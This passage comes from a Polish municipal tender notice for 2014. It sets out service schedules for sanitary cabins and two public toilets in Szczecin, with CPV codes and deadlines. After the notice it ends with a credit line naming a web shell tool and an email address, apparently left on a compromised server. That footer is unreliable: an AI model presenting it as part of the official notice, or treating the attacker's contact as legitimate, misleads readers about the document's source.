	      B. od 30.10.2014 r. do 03.11.2014 r. - (5 dni) jeden serwis dziennie, czyli 
	            15 serwisów,
                  C. od 04.11.2014 r. do 31.12.2014 r. - (8 tygodni) jeden serwis w tyg. (piątek), 		czyli 24 serwisy,
            d) kompleksowa obsługa 2 szt. kabin sanitarnych, które wystawione zostaną 
                  na  terenie Cmentarza Dąbie w okresach:
	       A.  od 01.01.2014 r. do 16.03.2014 r. - (11 tygodni) jeden serwis w tyg. (piątek), 		 czyli 22 serwisy,
	       B.  od 17.03.2014 r. do 29.10.2014 r. - (32,5 tygodnie) dwa serwisy w tyg. 			 (poniedziałek, piątek), czyli 130 serwisów,
	       C. od 30.10.2014 r. do 03.11.2014 r. - (5 dni) jeden serwis dziennie, czyli 
                         10 serwisów,
	       D. od 04.11.2014 r. do 31.12.2014 r. - (8 tygodni) jeden serwis w tyg. (piątek), 		 czyli 16 serwisów,


            e) kompleksowa obsługa 6 szt. kabin sanitarnych, które wystawione zostaną 
    na terenie Cmentarza Dąbie - 2 szt., Cmentarza Zdroje - 2 szt., Cmentarza
    Wielgowo - 1 szt., Cmentarza Płonia - 1 szt. (rozstawionych w dniu 29.10.2014 r.)
    w okresie:
	    od 30.10.2014 r. do 03.11.2014 r. - (5 dni) jeden serwis dziennie, czyli 
               30 serwisów.
2. Kompleksowa obsługa w przypadku kabin sanitarnych obejmuje: obsługę, wynajem, ubezpieczenie, posadowienie, transport na koszt i ryzyko Wykonawcy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kompleksowa obsługa kabin sanitarnych na terenie lasów miejskich w Szczecinie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Kompleksowa obsługa kabin sanitarnych na terenie lasów miejskich w Szczecinie
      a)	kompleksowa obsługa 1 szt. kabiny sanitarnej, która wystawiona zostanie 
           na ścieżce przyrodniczo - edukacyjnej przy ul. Miodowej w okresie:
A.  	styczeń, luty, marzec, październik, listopad, grudzień - jeden serwis w ciągu 
2 tygodni (piątek), 
B. 	kwiecień, wrzesień - jeden serwis w tygodniu (piątek), 
C.	maj, czerwiec, lipiec, sierpień - dwa serwisy w tygodniu (poniedziałek, piątek),
czyli 57 serwisów,
	b)  kompleksowa obsługa 1 szt. kabiny sanitarnej, która wystawiona zostanie na 	       	     Polanie Sportowej (w rejonie ul. Zegadłowicza) w okresie:
 A. 	styczeń, luty, marzec, październik, listopad, grudzień - jeden serwis w ciągu 
2 tygodni (piątek), 
 B. 	kwiecień, wrzesień - jeden serwis w tygodniu (piątek), 
 C.	maj, czerwiec, lipiec, sierpień - dwa serwisy w tygodniu (poniedziałek, piątek),
 czyli 57 serwisów,
      c) kompleksowa obsługa 1 szt. kabiny sanitarnej, która wystawiona zostanie 
		 na polanie przy Jeziorze Głębokim w okresie: 
 A. styczeń, luty, marzec, październik, listopad, grudzień - jeden serwis w ciągu 
2 tygodni (piątek), 
  B. 	kwiecień, wrzesień - jeden serwis w tygodniu (piątek), 
  C.	maj, czerwiec, lipiec, sierpień - dwa serwisy w tygodniu (poniedziałek, piątek),
  czyli 57 serwisów,
d)   kompleksowa obsługa 1 szt. kabiny sanitarnej, która wystawiona zostanie na
      polanie przy ul. Kupczyka z parkingiem leśnym w okresie: 
      A. 	styczeń, luty, marzec, październik, listopad, grudzień - jeden serwis w ciągu 
2 tygodni (piątek), 
  B. 	kwiecień, wrzesień - jeden serwis w tygodniu (piątek), 
  C.	maj, czerwiec, lipiec, sierpień - dwa serwisy w tygodniu (poniedziałek, piątek),
  czyli 57 serwisów,
       e) 	kompleksowa obsługa 1 szt. kabiny sanitarnej, która wystawiona zostanie 
na Polanie Czerwonej przy ul. Spacerowej w okresie:
       A.	styczeń, luty, marzec, październik, listopad, grudzień - jeden serwis w ciągu 
2 tygodni (piątek), 
  B. 	kwiecień, wrzesień - jeden serwis w tygodniu (piątek), 
C.	maj, czerwiec, lipiec, sierpień - dwa serwisy w tygodniu (poniedziałek, piątek),
czyli 57 serwisów,
	 f) 	kompleksowa obsługa 1 szt. kabiny sanitarnej, która wystawiona zostanie 
w Parku Leśnym Zdroje przy Jeziorze Szmaragdowym w okresie:
A.	styczeń, luty, marzec, październik, listopad, grudzień - jeden serwis w ciągu 
2 tygodni (piątek), 
B. 	kwiecień, wrzesień - jeden serwis w tygodniu (piątek), 
C.	maj, czerwiec, lipiec, sierpień - dwa serwisy w tygodniu (poniedziałek, piątek),
czyli 57 serwisów,
	 g) 	kompleksowa obsługa 1 szt. kabiny sanitarnej, która wystawiona zostanie w Parku Leśnym Zdroje przy Polanie Widok w okresie:
A.	styczeń, luty, marzec, październik, listopad, grudzień - jeden serwis w ciągu 
2 tygodni (piątek), 
B. 	kwiecień, wrzesień - jeden serwis w tygodniu (piątek), 
C.	maj, czerwiec, lipiec, sierpień - dwa serwisy w tygodniu (poniedziałek, piątek),
czyli 57 serwisów,
        h) 	kompleksowa obsługa 1 szt. kabiny sanitarnej, która wystawiona zostanie w Parku Leśnym Klęskowo w okresie:
A. styczeń, luty, marzec, październik, listopad, grudzień - jeden serwis w ciągu 
2 tygodni (piątek), 
B. 	kwiecień, wrzesień - jeden serwis w tygodniu (piątek), 
C.	maj, czerwiec, lipiec, sierpień - dwa serwisy w tygodniu (poniedziałek, piątek),
czyli 57 serwisów.
2. Kompleksowa obsługa w przypadku kabin sanitarnych obejmuje: obsługę, wynajem, ubezpieczenie, posadowienie, transport na koszt i ryzyko Wykonawcy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kompleksowa obsługa kabiny sanitarnej przy terenie Różanki w Szczecinie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Kompleksowa obsługa kabiny sanitarnej przy terenie Różanki 
				      	 w Szczecinie
      a) kompleksowa obsługa 1 szt. kabiny sanitarnej z umywalką, przystosowanej 
	      dla osób niepełnosprawnych, która wystawiona zostanie przy Różance przy 
	      ul. Fałata w okresie:
            od 17.03.2014 r. - 14.11.2014 r. - trzy serwisy w tygodniu (poniedziałki, środy, 	       piątki, do godz. 10.00, również w dni świąteczne), czyli 105 serwisów.
2. Kompleksowa obsługa w przypadku kabin sanitarnych obejmuje: obsługę, wynajem, ubezpieczenie, posadowienie, transport na koszt i ryzyko Wykonawcy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Kompleksowa obsługa kabin sanitarnych na kąpieliskach miejskich w Szczecinie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Kompleksowa obsługa kabin sanitarnych na kąpieliskach miejskich
				      	w Szczecinie
 a)  kompleksowa obsługa 3 szt. kabin sanitarnych z umywalką, przystosowanych 
	       dla osób niepełnosprawnych, które wystawione zostaną na kąpielisku Dąbie,
       Dziewoklicz i Głębokie (po 1 szt. na każdym kąpielisku) w okresie:
	       od 15.06.2014 r. do 31.08.2014 r. - jeden serwis w miesiącu (daty każdorazowo 	       uzgadniane z kierownikami poszczególnych kąpielisk), czyli 9 serwisów.
2. Kompleksowa obsługa w przypadku kabin sanitarnych obejmuje: obsługę, wynajem, ubezpieczenie, posadowienie, transport na koszt i ryzyko Wykonawcy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Kompleksowa obsługa szaletu publicznego znajdującego się przy Bramie   Głównej Cmentarza Centralnego w Szczecinie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kompleksowa obsługa szaletu publicznego znajdującego się przy Bramie Głównej Cmentarza Centralnego w Szczecinie 
             a) 	kompleksowa, całoroczna obsługa szaletu publicznego znajdującego się przy 	Bramie Głównej Cmentarza Centralnego w zakresie:
  	       A.  zapewnienia obsługi osobowej w godzinach otwarcia, tj.:
	             - od 01.01.2014 r. do 31.03.2014 r., poniedziałek - piątek, w godz. 8.00 - 		    16.00,
		 -  od 01.04.2014 r. do 11.11.2014 r., poniedziałek - niedziela, w godz. 8.00 - 		    18.00 (w dniu 01.11.2014 r. - w godz. 8.00 - 20.00),
		 - od 12.11.2014 r. do 31.12.2014 r., poniedziałek - piątek, w godz. 8.00 - 		    16.00;
Wykonawca zobowiązany będzie otwierać i zamykać szalet punktualnie 
o  wyznaczonej godzinie. 
Przed otwarciem szaletu Wykonawca będzie zobowiązany:
-  zmyć ściany, posadzki, drzwi, sedesy gorącą wodą z dodatkiem proszków 
    i płynów myjących,
-  wywietrzyć pomieszczenia szaletu,
- powycierać kurze z luster, parapetów, rur, kaloryferów oraz wszelkiego
    rodzaju wyposażenia ruchomego.

	       B. utrzymania szaletu publicznego wraz z wyposażeniem w należytym stanie 		 sanitarnym i estetycznym, zgodnie z zaleceniami Państwowej Inspekcji
            	 Sanitarnej, Państwowej Inspekcji Pracy, przepisami p.poż., oraz bieżącej 		 dezynfekcji pomieszczeń i urządzeń sanitarnych płynem typu Ace 
                  i Domestos; W trakcie obsługi szaletu Wykonawca zobowiązany będzie -
                  na danej zmianie - co najmniej 2-krotnie zmyć gorącą wodą z dodatkiem
                  proszków ew. płynów myjących muszle klozetowe, pisuary, umywalki oraz
                  posadzki. Po zmyciu posadzek, należy je przetrzeć środkiem dezynfekującym.
                  Wszystkie pomieszczenia oraz wyposażenie szaletu (szafy, szafki, stoły,
                  krzesła, kosze na odpadki, lustra, itp.) oraz okna i drzwi należy utrzymać 
                  na bieżąco w czystości.
	 C.	 wyposażenie szaletu publicznej w papier toaletowy, ręczniki jednorazowego 		 użytku, mydło, środki czystości i dezynfekująco - odkażające, itp.,
	 D.	 utrzymania urządzeń sanitarnych w stałej sprawności, w tym wykonywanie 		 drobnych czynności konserwatorskich, tj. m. in. wymiana wężyków,
                  uszczelek, przepalonych żarówek, baterii umywalkowych, desek sedesowych,
                  itp.,
	 E.	 udrażnianie przewodów kanalizacyjnych we własnym zakresie wewnątrz 		 pomieszczeń szaletu,
	 F.	 utrzymanie na bieżąco w czystości i porządku terenu bezpośrednio
                 przyległego do szaletu publicznego, tj. m.in. zamiatanie, odśnieżanie,
            	posypywanie piaskiem, ustawienie pojemnika na odpady, itp..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Kompleksowa obsługa szaletu publicznego znajdującego się przy ul. Zegadłowicza w Szczecinie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kompleksowa obsługa szaletu publicznego znajdującego się przy 
					ul. Zegadłowicza w Szczecinie
             a)  kompleksowa obsługa szaletu publicznego znajdującego się przy ul. Zegadłowicza 
	      w zakresie:
  	      A.  zapewnienia obsługi osobowej w godzinach otwarcia, tj.:
	               -  od 01.01.2014 r. do 28.02.2014 r., poniedziałek - niedziela, w godz. 8.00 		       - 16.00,
		    -  od 01.03.2014 r. do 31.03.2014 r., poniedziałek - niedziela, w godz. 8.00 		        - 17.00,
		    -  od 01.04.2014 r. do 30.09.2014 r., poniedziałek - niedziela, w godz. 8.00 		        - 20.00,
		    -  od 01.10.2014 r. do 31.10.2014 r., poniedziałek - niedziela, w godz. 8.00 		        - 18.00,
		    -  od 01.11.2014 r. do 30.11.2014 r., poniedziałek - niedziela, w godz. 8.00 		        - 17.00,
		    -  od 01.12.2014 r. do 31.12.2014 r., poniedziałek - niedziela, w godz. 8.00 		        - 16.00;
Wykonawca zobowiązany będzie otwierać i zamykać szalet punktualnie o wyznaczonej godzinie. 
Przed otwarciem szaletu Wykonawca będzie zobowiązany:
-  zmyć ściany, posadzki, drzwi, sedesy gorącą wodą z dodatkiem proszków 
    i płynów myjących,
-  wywietrzyć pomieszczenia szaletu,
- powycierać kurze z luster, parapetów, rur, kaloryferów oraz wszelkiego
    rodzaju wyposażenia ruchomego.


	       B. utrzymania szaletu publicznego wraz z wyposażeniem w należytym stanie 		 sanitarnym i estetycznym, zgodnie z zaleceniami Państwowej Inspekcji
            	 Sanitarnej, Państwowej Inspekcji Pracy, przepisami p.poż., oraz bieżącej 		 dezynfekcji pomieszczeń i urządzeń sanitarnych płynem typu Ace 
                  i Domestos; W trakcie obsługi szaletu Wykonanwca zobowiązany będzie -
                  na danej zmianie - co najmniej 2-krotnie zmyć gorącą wodą z dodatkiem
                  proszków ew. płynów myjących muszle klozetowe, pisuary, umywalki oraz
                  posadzki. Po zmyciu posadzek, należy je przetrzeć środkiem dezynfekującym.
                  Wszystkie pomieszczenia oraz wyposażenie szaletu (szafy, szafki, stoły, 
                  krzesła, kosze na odpadki, lustra, itp.) oraz okna i drzwi należy utrzymać 
                  na bieżąco w czystości.
	 C.	 wyposażenie szaletu publicznego w papier toaletowy, ręczniki jednorazowego 		 użytku, mydło, środki czystości i dezynfekująco - odkażające, itp.,
	 D.	 utrzymania urządzeń sanitarnych w stałej sprawności, w tym wykonywanie 		 drobnych czynności konserwatorskich, tj. m. in. wymiana wężyków,
                  uszczelek, przepalonych żarówek, baterii umywalkowych, desek sedesowych,
                  itp.,
	 E.	 udrażnianie przewodów kanalizacyjnych we własnym zakresie wewnątrz 		 pomieszczeń szaletu,
	 F.	 utrzymanie na bieżąco w czystości i porządku terenu bezpośrednio
                 przyległego do szaletu publicznego, tj. m.in. zamiatanie, odśnieżanie,
            	posypywanie piaskiem, ustawienie pojemnika na odpady, itp..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com